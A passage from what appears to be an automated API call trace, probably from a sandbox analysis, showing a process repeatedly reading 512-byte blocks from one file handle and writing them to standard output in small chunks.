lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] GetFileType (hFile=0x4c) returned 0x1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] GetFileType (hFile=0x4c) returned 0x1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.673] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.673] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.674] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.674] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.675] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.675] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.676] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.676] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.677] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.677] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.677] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.677] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] GetFileType (hFile=0x4c) returned 0x1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] GetFileType (hFile=0x4c) returned 0x1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] GetFileType (hFile=0x4c) returned 0x1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] GetFileType (hFile=0x4c) returned 0x1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] GetFileType (hFile=0x4c) returned 0x1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] GetFileType (hFile=0x4c) returned 0x1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] GetFileType (hFile=0x4c) returned 0x1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] GetFileType (hFile=0x4c) returned 0x1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.678] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.678] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] GetFileType (hFile=0x4c) returned 0x1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] GetFileType (hFile=0x4c) returned 0x1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] GetFileType (hFile=0x4c) returned 0x1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] GetFileType (hFile=0x4c) returned 0x1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] GetFileType (hFile=0x4c) returned 0x1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] GetFileType (hFile=0x4c) returned 0x1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] GetFileType (hFile=0x4c) returned 0x1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] GetFileType (hFile=0x4c) returned 0x1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.679] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.679] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] GetFileType (hFile=0x4c) returned 0x1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.680] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.680] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle 